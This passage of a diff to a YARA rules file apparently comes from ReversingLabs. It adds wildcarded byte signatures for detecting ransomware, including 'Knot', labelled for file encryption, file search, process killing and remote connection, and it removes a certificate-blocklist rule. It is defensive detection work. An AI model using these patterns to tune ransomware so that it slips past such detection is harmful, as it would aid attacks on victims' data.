+            ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57
+            C0 66 0F 13 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? 83 D2 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ??
+            ?? ?? ?? 7C ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ??
+            6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+        }
+		$encrypt_files_p2 = {
+            8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8A 45 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 05 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 75 ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ??
+            ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52
+        }
+		$encrypt_files_p3 = {
+            8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 8D ?? ??
+            ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ??
+            ?? ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D ??
+            89 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 52 8B
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D
+            C2
+        }
+		$search_files_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 53 8B 5D
+            ?? 56 89 8D ?? ?? ?? ?? 8B 4D ?? 57 89 8D ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 83
+            7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 72 ?? 8B
+            45 ?? 33 F6 8D 8D ?? ?? ?? ?? 56 56 56 51 56 50 FF 15 ?? ?? ?? ?? 8B F8 8B 85 ?? ??
+            ?? ?? 83 FF ?? 75 ?? C7 00 ?? ?? ?? ?? 33 C0 66 89 03 EB ?? 6A ?? 89 30 58 66 39 85
+            ?? ?? ?? ?? 75 ?? 66 39 B5 ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 B5 ??
+            ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 51 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 66 39 33 75 ?? 57
+            FF 15 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 01 8B F7 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
+            8B C6 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$search_files_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 8D 85 ?? ?? ??
+            ?? 56 8B 75 ?? 57 8B 7D ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 58 66 39 85 ??
+            ?? ?? ?? 75 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 66 83 BD ??
+            ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 58 75 ?? 68
+            ?? ?? ?? ?? 56 C7 03 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B 4D ?? 5F 5E 33 CD 5B E8 ??
+            ?? ?? ?? C9 C3 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 03 8D 85 ?? ?? ?? ?? 50 56 E8 ??
+            ?? ?? ?? 83 C4 ?? EB
+        }
+		$enum_resources = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 33 C0 89 45 ?? 66 89 45 ?? B9 ?? ?? ??
+            ?? 6B D1 ?? 66 8B 45 ?? 66 89 44 15 ?? B9 ?? ?? ?? ?? C1 E1 ?? BA ?? ?? ?? ?? 66 89
+            54 0D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51
+            6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 33 C0 66 89 45 ?? 8D
+            4D ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8D 4D ?? 51 8D 55 ?? 52
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 08 51 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 08 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 00 89 45 ?? 8B 4D ?? 51 8B
+            55 ?? 52 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
+            8B 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 64 89 0D ?? ?? ??
+            ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$kill_processes = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 88 85 ?? ?? ??
+            ?? 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 8D 4D
+            ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 95 ?? ??
+            ?? ?? 85 D2 74 ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B0 ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 32
+            C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$kill_processes_call = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ??
+            89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 3B 95 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+        }
+		$enum_resources_call = {
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B C8 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 55 ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and ( pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" or pe.signatures [ i ] . serial == "e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" ) and 1597708800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $kill_processes_call ) and ( $kill_processes ) and ( $enum_resources ) and ( all of ( $search_files_* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources_call )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Knot : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Knot ransomware."
 		author = "ReversingLabs"
-		id = "0aea5110-569b-5d9c-a2ce-a6a9fe75b58e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4dfe9da5-7ab1-57dc-95fc-b05777f235b8"
+		date = "2021-03-19"
+		modified = "2021-03-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4538-L4554"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Knot.yara#L1-L118"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dbf85cbd1d92823287749dac312f95576900753f60a694347b31b1e3aaa288a8"
+		logic_hash = "a7a3e13139d68314e583ec225a5d56373a551e67d46984dcf9a228a1f7275f14"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Knot"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 4D ?? 51
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75
+            ?? 32 C0 E9 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B
+            55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15
+        }
+		$encrypt_files_p2 = {
+            85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A
+            ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B
+            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A
+            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
+            ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 8D ?? ?? ??
+            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51
+            FF 15 ?? ?? ?? ?? B0 ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F B7 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 89 95 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 83 F8 ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            73 ?? 8B 95 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 95 ?? ?? ?? ?? 83 FA ?? 75
+        }
+		$find_files_p2 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 73 ?? 8B 8D ?? ?? ?? ?? 8B 14 8D ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 8D ?? ?? ??
+            ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
+            8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 83 F9 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 81 C2 ?? ?? ?? ?? 52 8D 95 ?? ?? ?? ??
+            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? ??
+            ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7F ?? 8D 85 ?? ?? ?? ?? 50 8B
+            8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74
